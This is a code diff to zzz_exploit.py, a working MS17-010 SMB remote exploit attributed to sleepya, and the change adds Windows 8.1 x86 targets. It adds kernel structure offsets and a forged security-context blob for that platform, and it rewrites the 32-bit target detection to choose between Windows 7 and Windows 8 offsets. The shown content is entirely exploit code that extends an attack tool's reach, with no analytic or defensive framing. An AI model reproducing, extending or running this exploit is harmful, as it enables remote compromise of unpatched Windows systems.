add support Win8 x86

zzz_exploit.py

@@ -7,11 +7,10 @@ import socket
 import time
 
 '''
-MS17-010 exploit for Windows 7+ x64 by sleepya
+MS17-010 exploit for Windows 7+ by sleepya
 
 Note:
 - The exploit should never crash a target (chance should be nearly 0%)
-- The exploit support only x64 target
 - The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed
 
 Tested on:
@@ -20,6 +19,7 @@ Tested on:
 - Windows 8.1 x64
 - Windows 2008 R2 SP1 x64
 - Windows 7 SP1 x64
+- Windows 8.1 x86
 - Windows 7 SP1 x86
 '''
 
@@ -88,6 +88,13 @@ WIN8_INFO = {
 	'SECCTX_SIZE': 0x38,
 }
 
+WIN8_32_INFO = {
+	'SESSION_SECCTX_OFFSET': 0x88,
+	'SESSION_ISNULL_OFFSET': 0x9e,
+	'FAKE_SECCTX': pack('<IIIIIIIIB', 0x24022a, 1, 0, 0, 0, 0, 2, 0, 1),
+	'SECCTX_SIZE': 0x24,
+}
+
 X86_INFO = {
 	'PTR_SIZE' : 4,
 	'PTR_FMT' : 'I',
@@ -161,10 +168,13 @@ def leak_frag_size(conn, tid, fid, info):
 	leakData = leakData[0x10d4:]  # skip parameters and its own input
 	if leakData[X86_INFO['FRAG_TAG_OFFSET']:X86_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':
 		print('Target is 32 bit')
-		if info['SESSION_SECCTX_OFFSET'] != WIN7_INFO['SESSION_SECCTX_OFFSET']:
+		if info['SESSION_SECCTX_OFFSET'] == WIN7_INFO['SESSION_SECCTX_OFFSET']:
+			info.update(WIN7_32_INFO)
+		elif info['SESSION_SECCTX_OFFSET'] == WIN8_INFO['SESSION_SECCTX_OFFSET']:
+			info.update(WIN8_32_INFO)
+		else:
 			print('The exploit does not support this 32 bit target')
 			sys.exit()
-		info.update(WIN7_32_INFO)
 		info.update(X86_INFO)
 	elif leakData[X64_INFO['FRAG_TAG_OFFSET']:X64_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':
 		print('Target is 64 bit')
@@ -423,7 +433,7 @@ def exploit(target, pipe_name):
 	# read session struct to get SecurityContext address
 	sessionData = read_data(conn, info, info['session'], 0x100)
 	secCtxAddr = unpack_from('<'+fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0]
-	
+
 	# copy SecurityContext for restoration
 	secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE'])